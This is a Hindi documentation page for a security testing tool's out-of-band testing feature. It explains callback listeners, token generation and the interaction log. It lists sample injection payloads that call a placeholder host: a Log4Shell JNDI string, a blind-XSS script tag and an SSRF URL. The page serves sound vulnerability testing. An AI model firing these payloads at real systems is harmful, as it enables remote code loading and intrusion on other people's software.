---
url: https://docs.ogmabox.com/hi/app/utilities/oast.md
description: Ogma में आउट-ऑफ़-बैंड एप्लिकेशन सुरक्षा परीक्षण के कॉलबैक कॉन्फ़िगर करें।
---

# OAST {#oast}

OAST (आउट-ऑफ़-बैंड एप्लिकेशन सुरक्षा परीक्षण) उन कमजोरियों का पता लगाता है जिनसे कोई दिखाई देने वाली प्रतिक्रिया नहीं मिलती; इसके बजाय लक्ष्य आपके नियंत्रण वाले लिसनर तक आउटबाउंड कनेक्शन बनाता है, जिससे समस्या की पुष्टि होती है।

## यह कैसे काम करता है {#how-it-works}

Ogma कई प्रोटोकॉल पर स्थानीय लिसनर चलाता है। जब लक्ष्य एप्लिकेशन इनमें से किसी लिसनर से संपर्क करता है, तो उस इंटरैक्शन के साथ स्रोत IP, टाइमस्टैम्प, प्राप्त डेटा और इंजेक्ट किया गया टोकन दर्ज होता है।

### लिसनर के प्रोटोकॉल {#listener-protocols}

| प्रोटोकॉल | डिफ़ॉल्ट पोर्ट | उपयोग |
|---|---|---|
| HTTP | कॉन्फ़िगर किया जा सकता है | SSRF, ब्लाइंड XSS, वेबहुक |
| HTTPS | कॉन्फ़िगर किया जा सकता है | TLS पर SSRF |
| DNS | कॉन्फ़िगर किया जा सकता है | ब्लाइंड इंजेक्शन, XXE, log4shell |
| SMTP | कॉन्फ़िगर किया जा सकता है | ईमेल हेडर इंजेक्शन, मेल सेवाओं पर SSRF |

OAST सेटिंग्स पैनल में लिसनर पोर्ट और बनाए गए टोकन में उपयोग होने वाला डोमेन नाम कॉन्फ़िगर करें।

## कॉलबैक टोकन बनाना {#generating-a-callback-token}

1. **उपयोगी उपकरण > OAST** खोलें।
2. **टोकन बनाएँ** पर क्लिक करें। प्रत्येक टोकन अपने परीक्षण के लिए अद्वितीय होता है।
3. टोकन कॉपी करें। इसमें आपके लिसनर का डोमेन और एक अद्वितीय पहचानकर्ता होता है, ताकि इंटरैक्शन को संबंधित परीक्षण से जोड़ा जा सके।

टोकन प्रारूप का उदाहरण: `[unique-id].[your-oast-domain]`

## पेलोड में टोकन उपयोग करना {#using-tokens-in-payloads}

कॉलबैक टोकन ऐसे किसी भी फ़ील्ड में इंजेक्ट करें जहाँ एप्लिकेशन बाहर जाने वाला कनेक्शन बना सकता है:

* **SSRF**: HTTP/HTTPS टोकन को लक्ष्य URL के रूप में उपयोग करें: `https://[token]/`
* **XXE**: DOCTYPE या किसी बाहरी एंटिटी के URL में टोकन का संदर्भ दें।
* **Log4Shell**: किसी हेडर में शामिल करें: `${jndi:ldap://[token]/a}`
* **ब्लाइंड XSS**: स्क्रिप्ट के src के रूप में इंजेक्ट करें: `<script src="https://[token]/x.js"></script>`
* **SMTP इंजेक्शन**: ईमेल हेडर में गंतव्य पते या URL के रूप में उपयोग करें।

## इंटरैक्शन लॉग {#interactions-log}

इंटरैक्शन पैनल प्रत्येक प्राप्त कॉलबैक दिखाता है:

| कॉलम | विवरण |
|---|---|
| समय | इंटरैक्शन प्राप्त होने का समय |
| प्रोटोकॉल | HTTP, HTTPS, DNS या SMTP |
| स्रोत IP | कनेक्शन बनाने वाला IP पता |
| टोकन | जिस टोकन से संपर्क किया गया |
| डेटा | अनुरोध पथ, DNS क्वेरी का नाम या SMTP डेटा |

किसी पंक्ति पर क्लिक करके इंटरैक्शन का पूरा विवरण देखें, जिसमें जहाँ लागू हो वहाँ अनुरोध हेडर और बॉडी भी शामिल हैं।

## इंटरैक्शन को परीक्षणों से मिलाना {#matching-interactions-to-tests}

हर टोकन अद्वितीय होने के कारण आप अलग-अलग पैरामीटर या अनुरोधों में अलग टोकन इंजेक्ट कर सकते हैं और सटीक रूप से पता लगा सकते हैं कि किस इंजेक्शन बिंदु से कॉलबैक शुरू हुआ।

## संबंधित पृष्ठ {#related-pages}

* [स्कैनर](./scanner.md)
* [निष्कर्ष](../findings.md)
